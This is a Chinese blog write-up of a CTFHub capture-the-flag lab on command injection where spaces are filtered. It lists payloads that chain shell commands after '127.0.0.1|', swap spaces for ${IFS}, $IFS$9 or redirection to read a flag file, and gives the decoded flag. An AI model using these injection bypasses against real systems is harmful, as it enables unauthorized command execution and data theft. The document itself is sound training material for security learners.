CTFhub-RCE-过滤空格

最新推荐文章于 2024-03-28 17:47:55 发布
最新推荐文章于 2024-03-28 17:47:55 发布
阅读量343 收藏
点赞数
分类专栏: CTFhub-RCE 文章标签: android 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ssss39/article/details/134434486
版权

1. 查看当前目录:127.0.0.1|ls

2.  查看 flag_890277429145.php

127.0.0.1|cat flag_890277429145.php

根据题目可以知道空格被过滤掉了 

 3.空格可以用以下字符代替:
< 、>、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等

$IFS在linux下表示分隔符,但是如果单纯的cat$IFS2,bash解释器会把整个IFS2当做变量名,所以导致输不出来结果,因此这里加一个{}就固定了变量名。
同理,在后面加个$可以起到截断的作用,使用$9是因为它是当前系统shell进程的第九个参数的持有者,它始终为空字符串。

payload:

127.0.0.1|cat<flag_890277429145.php|base64

127.0.0.1|cat>flag_890277429145.php|base64

127.0.0.1|cat${IFS}flag_890277429145.php|base64

127.0.0.1|cat$IFS$9flag_890277429145.php|base64

base64 解密:

<?php // ctfhub{0f8603081311cfa9c7d1f760}

斜躺青年
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFHub | 过滤空格
尼泊罗河伯的博客
12-04 2412
根据网页显示内容提示,这题关于过滤空格注入,此题和其他的注入手法一致,只不过需要在网页 URL 中对 payload 语句中的空格符号进行过滤,判断发现此题存在过滤空格注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8460
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
RCE(远程命令执行)绕过总结
Elite的博客
04-18 3453
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
命令执行RCE及其绕过详细总结(各情景下的绕过)
2301_76690905的博客
12-12 4747
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
CTFhub】命令注入—过滤空格
manerzi的博客
10-25 645
CTFhub】命令注入—过滤空格
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 ...
Apache-druid-kafka-rce.yaml
最新发布
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
x微E-Cology WorkflowServiceXml RCE1
08-03
x微E-Cology WorkflowServiceXml RCEx 微 E-Cology WorkflowServiceXml RCEx 微 E-Cology
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POCpoc只需验证某人的路径的返回状态POC仅用于测试,未添加EXP模块POC仅用于测试,未加入exp模块
Apache-Solr-RCE-via-Velocity-template
03-09
Apache-Solr-RCE-Velocity模板突破产生原因:当攻击者可以直接访问Solr控制台时,可以通过发送类似/例程名/ config的POST请求该例程的配置文件进行更改。 Apache Solr内置IntegratedVelocityResponseWriter插件,在...
CTFHUB-过滤空格
Web学习之路
03-28 266
替换
[WUSTCTF2020]朴实无华 md5特殊值/intval绕过/过滤空格
m0_64180167的博客
09-19 189
dirsearch扫吧然后就可以得到 robots.txt了 记得降低点线程-t 50 这样我们去访问一下去看看 但是这个文件名一看就是fake的抓抓包看看有没有传递什么吧这里不是很顺的 其实前面耶抓包看看了 但是没有东西就不放上来了访问一下咯乱码 火狐 ALT -> 查看 -> 修复文字编码 即可。
buuctf
weixin_57439582的博客
03-05 211
buuctf
网安入门21——RCE(绕过方法梳理)
m0_61499194的博客
10-04 277
所以前面的“IFS”可以改为 “$IFS$9”。less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符。9表示当前系统shell进程的第九个参数,通常是一个空字符。tac:从最后一行倒序显示内容,并将所有内容输出。cat:由第一行开始显示内容,并将所有内容输出。more:根据窗口大小,一页一页的现实文件内容。是Linux存在的环境变量,是内部字段分隔符。反引号可以将ls列出的内容全部cat输出一遍。nl:类似于cat -n,显示时输出行号。目标是获取flag.txt的内容。
CTFHub-空格过滤-wp
z1moq的博客
05-18 246
空格过滤 **原理:**在php中提前写好当输入字符中有空格时返回 “Hacker!!!” 来防止sql注入 空格为空字符,可用php中的多行注释/**/来代替空格,以正常执行sql语句 剩余做法与整数型注入相同
CTFHub技能书解题笔记-RCE-过滤空格过滤目录分隔符、过滤运算符
qq_43006864的博客
04-01 3814
一、过滤空格 过滤空格。 引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 直接开始解题 这里就用<来绕过。flag还是再界面源码。 二、过滤目录分隔符 题目提示,这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx
RCE绕过的简介以及常见的绕过方式(个人学习笔记)
2302_80935968的博客
03-28 879
1.目录分隔符被过滤后,无法通过cat等查看目录的命令直接读取文件夹的目录里的PHP文件,而是需要先进入该文件夹(查看文件夹目录),再通过cat读取PHP文件的内容。进入题目,查看源代码,为php函数,该函数意思为:判断是否有变量cmd,如果有,则执行eval($_REQUEST[‘cmd’]);查看网页信息,该题对注入的命令无任何过滤,且当输入ip的时候,cmd会执行ping命令,尝试ping 127.0.0.1 | ls ,可以正常连接。命令 system():执行系统命令并输出执行结果。
[GXYCTF2019]Ping Ping Ping - RCE(空格、关键字绕过[3种方式])
oZuoShen123的博客
10-11 609
/?ip= |\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){ echo preg_match("/\&|\/|\?|\*|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); die("fxck your symbol!"); } else if(preg_match("/ /", $ip)){ die("fxck your space!"); } else
Linux下RCE绕过空格限制
weixin_44971601的博客
09-29 1161
Linux下RCE绕过空格限制
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斜躺青年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值